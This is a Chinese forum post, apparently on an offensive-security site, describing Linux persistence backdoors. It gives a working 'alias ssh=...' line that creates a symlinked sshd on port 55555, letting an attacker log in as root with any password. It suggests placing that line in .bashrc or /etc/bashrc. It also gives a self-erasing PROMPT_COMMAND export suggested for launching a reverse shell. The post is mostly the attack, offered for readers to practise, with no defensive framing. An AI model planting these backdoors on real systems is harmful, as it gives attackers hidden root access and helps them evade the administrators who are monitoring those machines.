今天讲的是linux权限控制的手法,总结了下大概有以下这些:
最近也在总结这些方法,就想着是否可以将其中的控制手法组合起来形成一个新的手法呢?说干就干
alias + 软链接:
alias ssh='rm -rf /tmp/su;ln -fs /usr/sbin/sshd /tmp/su;/tmp/su -oport=55555;ssh'
我们写到环境变量中,有六种环境变量文件自己可以去了解(.bashrc、/etc/bashrc等),这样每个用户登录的时候都会生效
别名就是ssh现在就是别名等于的哪个指令
我们执行ssh相当于执行了rm -rf /tmp/su;ln -fs /usr/sbin/sshd /tmp/su;/tmp/su -oport=55555;ssh这一串
这就好办了,每当用户执行的时候就会生成一个软连接后门
实操一遍:
1、当使用ssh的时候就会成功的建立软链接
2、使用kali连接,这里是root用户密码随便输入,这时候我们就会是root权限
PROMPT_COMMAND后门,PROMPT_COMMAND就是没执行完一条指令的时候都会执行这个,才会输出root<span>@hjw123</span>:
这时候我们照样可以将其写入环境变量中
export PROMPT_COMMAND="(命令 &) 2> /dev/null;unset PROMPT_COMMAND"
这条指令是相当的牛逼,执行一次然后就会删除,十分的隐蔽,这里的命令可以使用反弹shell。
这里的实操可兄弟们自己实践,也算是一种提升
感谢大家的阅读,可加我分享内网知识流程图,内容还是相对全面的:
目的是想广交一些朋友带我一起提升web实战经验qq:702672860@qq.com
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 350.00 | 0 | 2023-06-20 11:11:37 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.